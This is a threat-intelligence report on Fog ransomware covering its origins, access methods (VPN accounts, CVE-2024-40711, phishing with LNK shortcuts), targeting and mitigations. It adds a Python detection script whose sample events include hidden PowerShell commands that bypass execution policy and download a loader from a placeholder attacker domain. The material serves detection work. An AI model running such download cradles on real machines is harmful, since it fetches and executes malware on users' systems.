Full Report
Fog ransomware is a sophisticated threat actor known for rapid encryption and lack of centralized organization. This post explores the origins, operations, attacks, and the known unknowns of Fog.
Analysis Summary
# Threat Actor: Fog Ransomware
## Attribution & Identity
Fog is classified as a ransomware variant rather than a single dedicated threat actor group. There is no evidence of a centralized operation, suggesting it can be used by different threat actors independently. Developers and intrusion operators appear separate. It is explicitly stated that Fog does **not** fit the description of a Ransomware-as-a-Service (RaaS) operation, although its modular design could permit future RaaS usage. Despite being a variant, the actors utilizing it share common TTPs, infrastructure, and communication methods (e.g., branded leak site, negotiation portal).
## Activity Summary
Fog ransomware emerged in April 2024, characterized by rapid encryption and double extortion tactics. Initial operations targeted educational institutions via compromised VPN accounts. Activities expanded to include government agencies and various business sectors. As of April 2025, 189 victims have been publicly reported.
## Tactics, Techniques & Procedures
- **Initial Access:** Compromised VPN accounts (often purchased from Initial Access Brokers, IABs), exploitation of unpatched software (specifically Veeam Backup & Replication, CVE-2024-40711), and phishing campaigns.
- **Delivery Mechanism (Phishing):** Phishing emails impersonate VPN updates, invoice inquiries, or HR policy changes. Recent phishing uses ZIP files containing a malicious LNK shortcut that executes a PowerShell script ("stage1.ps1") to download the ransomware loader.
- **Extortion:** Employs double extortion tactics.
- **Communication:** Actors communicate during attacks using Command-and-Control (C2) servers and encrypted channels.
- **Ransom Notes:** Notes sometimes mock victims using references to Edward Coristine and the U.S. Department of Government Efficiency (DOGE), although no genuine affiliation with DOGE exists.
- **Modularity:** The ransomware’s modular design allows attackers to precisely control the scope of encryption, encryption pace, and ransom note content.
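The phishing delivery chain above (ZIP, LNK shortcut, hidden PowerShell running "stage1.ps1" to fetch the loader) is the stage endpoint telemetry should catch before encryption begins. The following is an added example, not code from the original report: a small Python detection run over constructed Sysmon-style process-creation events; the event fields, file paths and the placeholder domain are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    # LNK inside an extracted ZIP double-clicked: explorer launches a hidden, staged script
    {"parent": EXPLORER, "image": POWERSHELL,
     "cmdline": r"powershell.exe -w hidden -ep bypass -f C:\Users\alice\AppData\Local\Temp\stage1.ps1"},
    # Same parent, download cradle pulling a loader from a placeholder attacker-controlled domain
    {"parent": EXPLORER, "image": POWERSHELL,
     "cmdline": r"powershell.exe -NoP -W Hidden -c iwr http://loader.attacker-domain.example/f -OutFile $env:TEMP\l.exe"},
    # Benign: an administrator runs PowerShell from a console
    {"parent": r"C:\Windows\System32\cmd.exe", "image": POWERSHELL,
     "cmdline": "powershell.exe -c Get-Process"},
    # Benign: a user opens an archive tool from the desktop
    {"parent": EXPLORER, "image": r"C:\Program Files\7-Zip\7zFM.exe",
     "cmdline": r"C:\Program Files\7-Zip\7zFM.exe C:\Users\alice\Downloads\invoice.zip"},
]

DOWNLOAD_CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b", re.I)
HIDDEN_FLAGS = re.compile(r"-(w|win|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I)
STAGED_SCRIPT = re.compile(r"\\(temp|downloads)\\\S*\.ps1\b", re.I)

def score_event(event):
    """Return the list of reasons an event resembles the LNK -> PowerShell -> download chain."""
    reasons = []
    if not event["image"].lower().endswith("powershell.exe"):
        return reasons
    cmd = event["cmdline"]
    if event["parent"].lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer (shortcut or double-click launch)")
    if HIDDEN_FLAGS.search(cmd):
        reasons.append("hidden window / execution policy bypass flags")
    if STAGED_SCRIPT.search(cmd):
        reasons.append("script executed from a user temp or download directory")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    return reasons

def detect(events, min_reasons=2):
    """Flag events carrying at least min_reasons indicators; a single indicator alone is too noisy."""
    alerts = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            alerts.append({"cmdline": ev["cmdline"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["cmdline"], "->", "; ".join(alert["reasons"]))
```

Tune `min_reasons` against your own baseline of explorer-launched PowerShell before deploying; the two benign events show why a single indicator should not page anyone.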
## Targeting
- **Sectors:** Business services, technology, manufacturing, education, and government (top five sectors as of February 2025).
- **Geography:** Most victims are based in the United States. Threat actors conspicuously avoid targeting Eastern European countries and the People’s Republic of China.
- **Victims:** Educational institutions, government agencies, and businesses.
## Tools & Infrastructure
- **Malware families used:** Fog ransomware variant.
- **Infrastructure (C2, domains, IPs):** An IP address associated with Fog activity was traced back to Moscow in 2024. Actors use attacker-controlled domains to fetch payloads and leverage C2 servers for communication.
- **Specific CVEs:** Actively exploits CVE-2024-40711 (Veeam Backup & Replication).
## Implications
Fog represents a financially motivated threat that has rapidly diversified its targeting sectors. The use of common infrastructure and communication channels across unrelated intrusions suggests a coordinated threat ecosystem around the malware variant, even though it is not centrally organized in the way a RaaS operation is. The median initial ransom demand was calculated at $220,000. The primary vector relies on exploiting external remote access solutions (VPNs) and unpatched software.
## Mitigations
- Implement strong foundational security practices, including layered security measures.
- Enforce Multifactor Authentication (MFA) and Zero Trust Access principles.
- Maintain robust patch management, especially for remote access systems like VPNs, and decommission unused accounts.
- Segment networks to isolate sensitive data and backup systems, restricting intruder movement.
- Utilize advanced security solutions (e.g., Managed XDR) capable of identifying and stopping pre-encryption activities.
- Implement top-tier backup solutions for data, configurations, and cloud deployments.
- Conduct regular security awareness training focused on recognizing current phishing campaigns (e.g., those mimicking VPN requests or HR documents).